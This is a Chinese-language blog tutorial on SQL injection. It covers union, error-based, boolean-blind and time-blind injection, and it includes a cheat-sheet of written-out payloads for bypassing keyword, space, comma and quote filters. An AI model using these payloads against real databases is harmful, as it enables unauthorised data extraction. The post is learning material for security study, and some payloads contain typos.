当前位置: 首页 > news >正文

SQL注入基础及绕过手段

SQL注入是什么

简单来说SQL注入,就是将攻击者输入的恶意代码被传到后端与SQL语句一起构造并在数据库中执行

通过不同的手段,SQL注入可以分为一下几类

select * from article where artid = 1 and xxxxx;

首先我们来看一下一个最基础的SQL注入例子

这是一段正常的SQL查询语句,如果我们输入1,那么就会查询id为1的文章

如果此时我们输入了1加一个单引号,那么此时的查询语句就是这样的

由于单引号没有闭合,从而导致SQL查询出错。

而基于不同的过滤,MYSQL版本或者是其他东西等,SQL注入就分为了很多种方法,

这里我们举了最常见的几种SQL注入方法。

1.联合注入

也是我们最简单最基础的一种注入方法,基本上SQL注入都是从联合注入开始学的

通过union语句,我们可以同时查询多组数据

例如最简单的查询数据库名:

1' union select 1,database()#

有时候只会回显一组数据,那么我们就可以改为

-1' union select 1,database()#

2.报错注入

就是通过报错回显的信息从而达成查看信息的目的

1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

常见被利用的有旁边我列出来的几种函数

3.布尔盲注

适用于没有数据回显的情况下

通过不同的回显进行判断是否成功

如这里我们查询数据库名的长度:

1' and length(database())=4#

4.时间盲注

和布尔盲注类似,只不过利用了sleep()函数,通过响应时间来判断

其他的注入方式我就简单说说,因为目前我也没见到过很多这种题

例如更新注入就是利用update语句进行注入

堆叠注入和命令拼接类似,都是用分号同时执行多条语句

二次注入就是利用了后端对数据库的信任,对数据库取出来的数据不进行处理从而导致注入问题

还有宽字节注入等,利用了编码的错误实现绕过

常见绕过方式

注释符

'#', '--+', '-- -', '%23', '%00', '/**/'

"and、or" 过滤

# 可以使用"&&"和"||"代替?id=1 && 1=1 --+ # 盲注,异或运算相同为0,不同为1;根据返回值0,1判断?id=1 union select (substr(database(),1,1)='s') ^ 0 --

关键词过滤

  • 大小写绕过id=-1' UnIoN SeLeCT xxx
  • 双写绕过适用于将关键词置空的场景id=-1'UNIunionONSeLselectECT1,2,3–-
  • 编码绕过可以使用URL,hex,ASCII等编码绕过例如'or 1=127%20%4F%52%201%3D%31%20%2D%2D
  • 注释绕过内联注释/**/将关键词分隔开id=1' UN/**/ION SE/**/LECT database() --

空格过滤

  • 内联注释代替空格id=1_/**/_and_/**/_1=1
  • 括号嵌套select(group_concat(table_name))from(information_schema.taboles)where(tabel_schema=database());
  • 制表符、换行、不可见空格%09(制表符), %0a(换行), %0b(垂直制表符), %0d(回车), %a0(不间断空格)
  • 反引号union(select`table_name`,`table_type`from`information_schema`.`tables`);

比较符号 "=、<、>"过滤

  • in()ascii(substr(select database(),1,1)) in(115); //根据回显判断
  • likelike代替'='
  • 正则表达式select database() regexp '^s'; //根据回显判断

逗号过滤

逗号被过滤时可以使用from...for...

select substr(select database() from 1 for 1);select substr(select database() from 2 for 1);

limit中的逗号可以替换成offset

select * from users limit 1 offset 2;

需要注意,limit 1,2 指的是从第一行往后取2行(包括第一行和第二行);而limit 1 offset 2是从第一行开始只取第二行

False注入

select * from users where username = 0;		# 查询表中所有数据

其实是利用了mysql的隐式类型转换,当字符串与数字比较时,会将字符串转换为浮点数,转换失败并返回0,0 = 0返回True,就会返回表中所有数据

绕过引号构造0的方法

select * from users where username = ''+'';select * from users where username = ''-'';select * from users where username = ''*'';select * from users where username = ''%1#';select * from users where username = ''/6#';

等价函数

  • if()=> case...when..then...else...end
0' or if((ascii(substr((select database()),1,1))>97),1,0)#=0' or case when ascii(substr((select database()),1,1))>97 then 1 else 0 end#
  • sleep() => benchmark()

​ benchmark()函数用来测试执行速度,第一个参数代表执行的次数,第二个参数代表要执行的表达式或函数,根据执行的时间来判断

  • concat_ws() => group_concat()
select group_concat(database());=select concat_ws(1,database());
  • substr() => substring() / lpad() / rpad() / left() / mid()
http://www.jsqmd.com/news/31289/

相关文章:

  • WPF实现组件拖动(Grid)
  • 关于嵌入式硬件需要了解的基础知识 - 教程
  • spring-boot-actuator-Health原理
  • 2025年广州防霉检测机构权威推荐榜单:除螨检测/除臭效果测试/输配水设备检测源头机构精选
  • 2025年钣金机箱外壳加工厂家权威推荐榜单:钣金壳体/变频器钣金壳体/钣金加工壳体源头厂家精选
  • 从零到一:我的开源AI商业化实战之路
  • 机器学习 BASEML到底是什么
  • 体育馆游泳卡押金原路退回,安心无忧—东方仙盟 - 指南
  • DesignSpark Mechanical (DSM)输入用户名密码提示在注册过程中发生错误
  • 字段(辨析:字段、对象、属性和方法在 JavaScript 中的关系)
  • P14364 [CSP-S 2025] 员工招聘 / employ 笔记
  • Spring boot 使用虚拟线程示例
  • 微算法科技(NASDAQ MLGO):以隐私计算区块链筑牢多方安全计算(MPC)安全防线
  • 怎么把idea的目录结构,以文本形式输出?——idea使用tree
  • 2025年11月沼气直燃厂家综合评测:徐州海德测控技术有限公司领跑
  • 微信小程序初始配置
  • python爬虫scrapy框架使用 - 教程
  • 2025年塑烧板除尘器源头厂家权威推荐榜单:耐高温除尘器/防爆除尘器/不锈钢除尘器源头厂家精选
  • 2025年剪叉升降平台供应商权威推荐榜单:车载剪叉式升降平台/移动剪叉式升降平台车/轨道升降平台源头厂家精选
  • 第180天:横向移动篇入口切换SMB共享WMI管道DCOM组件Impacket套件CS插件
  • 2025年11月沼气直燃品牌/品牌排名前十:技术实力对比与总结
  • 高效学习方式——知识关联性
  • 基于时间的ACL - 教程
  • 2025年云南做楼体灯光亮化服务商权威推荐榜单:云南做酒店灯光亮化/云南做居民楼灯光亮化/云南做写字楼灯光亮化服务商精选
  • 信息系统方案的范围管理(12345智慧政务)
  • [Python刷题记录]-三数之和-双指针-中等
  • Serilog日志库简单实践(一):控制台与调试Sinks(.NET 8)汇报总结
  • WPF实现组件拖动(Canvas)
  • 2025 年最新测控终端厂家推荐:符合国标 + 数据透传技术,靠谱企业深度测评报告4G 测控终端/远程测控终端/物联网测控终端/测控终端 RTU 公司推荐
  • 使用Node.js开发MCP服务器入门总结